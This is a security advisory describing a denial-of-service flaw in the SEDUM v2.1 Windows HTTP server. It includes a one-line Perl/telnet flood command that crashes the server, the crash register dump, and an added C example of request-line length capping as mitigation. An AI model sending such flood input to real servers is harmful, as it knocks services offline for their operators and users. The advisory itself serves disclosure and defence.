COMMAND

    Sedum

SYSTEMS AFFECTED

    SEDUM v2.1 HTTPd

PROBLEM

    'slipy' found the following.  SEDUM is a standard HTTP server designed
    for Internet/Intranet purposes.  SEDUM supports parametric HTML files
    and direct access to databases for simple and powerful network data
    management.  This software is for the Microsoft Windows operating
    system.

    SEDUM v2.1 is vulnerable to a nasty Denial of Service attack: it can
    be flooded with useless junk until the server crashes, which happens
    within seconds.  Once it has crashed it has to be restarted before it
    works again.  All Windows versions appear to be affected.

    Examples:

        echo `perl -e 'print "A" x 250000'` | telnet .com 80

        ^^ = Will cause the program to quit within seconds and display:

        EDUM caused an invalid page fault in
        module <unknown> at 0000:0111001e.
        Registers:
        EAX=0122968c CS=016f EIP=0111001e
        EFLGS=00010206 EBX=00000000 SS=0177
        ESP=006dfab0 EBP=006dfadc ECX=0111027c
        DS=0177 ESI=0048258c FS=7677 EDX=0111000c
        ES=0177 EDI=00000000 GS=0000 Bytes at CS:EIP:
        00 a0 2c 00 11 01 0c 00 11 01 00 02 00 00 01 00
        
        Stack dump:
        0042bbed 00000001 0048258c 0042ba02 00000000
        0048258c 004575fd 00000000  005b037c 012291d0
        005b03e4 00000001 004576cc 0000008c 000005b4
        00457751
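
    The advisory does not say which routine faults, only that a 250000-
    byte request line brings the server down.  The following is an added
    example, not SEDUM code, showing the mitigation a server needs
    against that input: cap the request line before buffering it, so a
    line of any length is rejected after a fixed amount of work.  The
    8 KiB cap (MAX_REQUEST_LINE), the status codes and the helper names
    are assumptions made for the example.

```c
/* Bounded HTTP request-line reader.  Added example, not SEDUM code: the
 * advisory does not identify the faulting routine ("module <unknown>"),
 * so this shows the generic mitigation for the failure mode it describes.
 * A server that copies the request line into a fixed buffer, or keeps
 * growing a buffer until it sees a newline, is what a 250000-byte line
 * of 'A's breaks.  Capping the line up front avoids both.
 * MAX_REQUEST_LINE is an assumed value; 8 KiB is a common server default. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_REQUEST_LINE 8192

enum req_status { REQ_OK = 0, REQ_TOO_LONG = 1, REQ_INCOMPLETE = 2 };

static char g_line[MAX_REQUEST_LINE + 1];   /* last accepted request line */

/* Look for the end of the request line in `in` (in_len bytes received so
 * far, simulating the socket buffer).  At most MAX_REQUEST_LINE + 2 bytes
 * are ever inspected (line plus CRLF), so the cost of rejecting an
 * oversized request does not grow with the size of the input. */
enum req_status read_request_line(const char *in, size_t in_len,
                                  char *out, size_t out_cap)
{
    size_t window = MAX_REQUEST_LINE + 2;
    size_t scan = in_len < window ? in_len : window;
    size_t i;

    if (out_cap < MAX_REQUEST_LINE + 1)
        return REQ_TOO_LONG;            /* output buffer too small: refuse */

    for (i = 0; i < scan; i++) {
        size_t n;
        if (in[i] != '\n')
            continue;
        n = i;
        if (n > 0 && in[n - 1] == '\r')
            n--;                        /* accept CRLF or bare LF */
        if (n > MAX_REQUEST_LINE)
            return REQ_TOO_LONG;
        memcpy(out, in, n);
        out[n] = '\0';
        return REQ_OK;
    }
    /* No terminator inside the window: either the window is full (reject)
     * or we are still under the cap and simply need more bytes. */
    return in_len >= window ? REQ_TOO_LONG : REQ_INCOMPLETE;
}

/* Classify a literal request fragment; an accepted line lands in g_line. */
enum req_status classify_request(const char *in, size_t in_len)
{
    return read_request_line(in, in_len, g_line, sizeof g_line);
}

const char *last_request_line(void)
{
    return g_line;
}

/* Constructed flood input: `len` bytes of 'A', optionally CRLF-terminated,
 * mirroring the shape of the advisory's proof of concept. */
enum req_status classify_flood(size_t len, int terminated)
{
    size_t total = len + (terminated ? 2 : 0);
    char *buf = malloc(total + 1);
    enum req_status st;

    if (!buf)
        return REQ_TOO_LONG;            /* treat allocation failure as refusal */
    memset(buf, 'A', len);
    if (terminated)
        memcpy(buf + len, "\r\n", 2);
    st = read_request_line(buf, total, g_line, sizeof g_line);
    free(buf);
    return st;
}

int main(void)
{
    enum req_status st = classify_request("GET /index.html HTTP/1.0\r\n", 26);
    printf("normal request: status %d, line \"%s\"\n", st, last_request_line());
    printf("250000 x 'A': status %d (1 = rejected as too long)\n",
           classify_flood(250000, 0));
    printf("%d x 'A' + CRLF: status %d (0 = accepted, exactly at the cap)\n",
           MAX_REQUEST_LINE, classify_flood(MAX_REQUEST_LINE, 1));
    return 0;
}
```

    Run stand-alone, main() shows a normal request accepted, the
    250000-byte flood rejected and a line exactly at the cap accepted.
    In a real server the REQ_TOO_LONG result should be answered with a
    414 (Request-URI Too Long) and the connection closed, rather than
    the input being read any further.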

SOLUTION

    Vendor has been notified; awaiting reply.  Judging from the posts
    about the directory traversals in SEDUM and the author's response,
    don't expect a fix anytime soon.